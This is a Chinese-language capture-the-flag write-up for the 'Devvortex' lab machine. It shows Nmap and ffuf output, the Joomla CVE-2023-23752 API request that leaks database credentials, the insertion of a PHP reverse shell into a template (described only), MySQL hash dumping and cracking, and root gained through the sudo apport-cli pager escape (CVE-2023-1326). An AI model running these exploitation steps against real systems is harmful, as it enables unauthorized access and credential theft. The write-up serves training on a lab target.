本文介绍了一个针对名为"Devvortex"的Linux系统的渗透测试过程。通过Nmap扫描发现开放的SSH和HTTP端口,随后使用FFUF工具进行子域名和目录的发现。找到Joomla管理登录页面后,利用CVE-2023-23752漏洞获取管理员凭据。进一步通过添加PHP反向shell获取MySQL数据库凭据,破解用户hash获取特权用户的凭据。最后,通过使用sudo执行apport-cli工具并利用CVE-2023-1326漏洞获得root权限。本文总结了渗透测试的关键步骤和利用的漏洞。
Information Gathering
# Nmap 7.98 scan initiated Sat Dec 27 09:08:15 2025 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.10.11.242
Nmap scan report for 10.10.11.242
Host is up (0.12s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-title: Did not follow redirect to http://devvortex.htb/
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.19
Uptime guess: 15.115 days (since Fri Dec 12 06:22:47 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Dec 27 09:08:31 2025 -- 1 IP address (1 host up) scanned in 15.48 secondsVulnerability Analysis
由于页面都是静态的所以寻找虚拟机
➜ Devvortex ffuf -u http://devvortex.htb/ -w /usr/share/wordlists/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:FUZZ -H 'Host: FUZZ.devvortex.htb' -t 100 -fs 154
dev [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 351ms]打开dev.devvortex.htb,发现也是静态,寻找一下子目录
➜ Devvortex ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://dev.devvortex.htb/FUZZ -ic
images [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]
home [Status: 200, Size: 23221, Words: 5081, Lines: 502, Duration: 722ms]
media [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
templates [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 380ms]
modules [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 363ms]
plugins [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 624ms]
includes [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 364ms]
language [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 341ms]
components [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 344ms]
api [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 420ms]
cache [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 412ms]
libraries [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 526ms]
tmp [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 416ms]
layouts [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 481ms]
administrator [Status: 301, Size: 178, Words: 6, Lines: 8, Duration: 353ms]http://dev.devvortex.htb/administrator/得到Joomla Administrator Login,查找到一个漏洞CVE-2023-23752
在GitHub中找到Version目录https://github.com/joomla/joomla-cms/blob/5.4-dev/administrator/manifests/files/joomla.xml
http://dev.devvortex.htb/administrator/manifests/files/joomla.xml得到4.2.6可以使用CVE-2023-23752
Exploitation (User Flag)
➜ Devvortex curl http://dev.devvortex.htb/api/index.php/v1/config/application\?public\=true -vv | jq得到凭据lewis:P4ntherg0t1n5r3c0n##
我们在System > Site Templates > Cassiopeia Details and Files > error.php添加php反向shell
ss -tlpn->3306,33060得知mysql
www-data@devvortex:~/dev.devvortex.htb$ less configuration.php
public $dbtype = 'mysqli';
public $host = 'localhost';
public $user = 'lewis';
public $password = 'P4ntherg0t1n5r3c0n##';mysql -u lewis -p登录数据库
枚举数据库得到
| 650 | logan paul | logan | logan@devvortex.htb | $2y$10$IT4k5kmSGvHSO9d6M/1w0eYiB5Ne9XzArQRFJTGThNiy/yBtkIj12
破解hash值得到凭据logan:tequieromucho
Privilege Escalation (Root Flag)
logan@devvortex:~$ sudo -l
Matching Defaults entries for logan on devvortex:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User logan may run the following commands on devvortex:
(ALL : ALL) /usr/bin/apport-cli
logan@devvortex:~$ sudo /usr/bin/apport-cli -v
2.20.11搜索得到CVE-2023-1326
logan@devvortex:~$ sudo /usr/bin/apport-cli -f
# 输入2
# 输入1或随机
# 输入V
# 输入!/bin/bash
即可得到root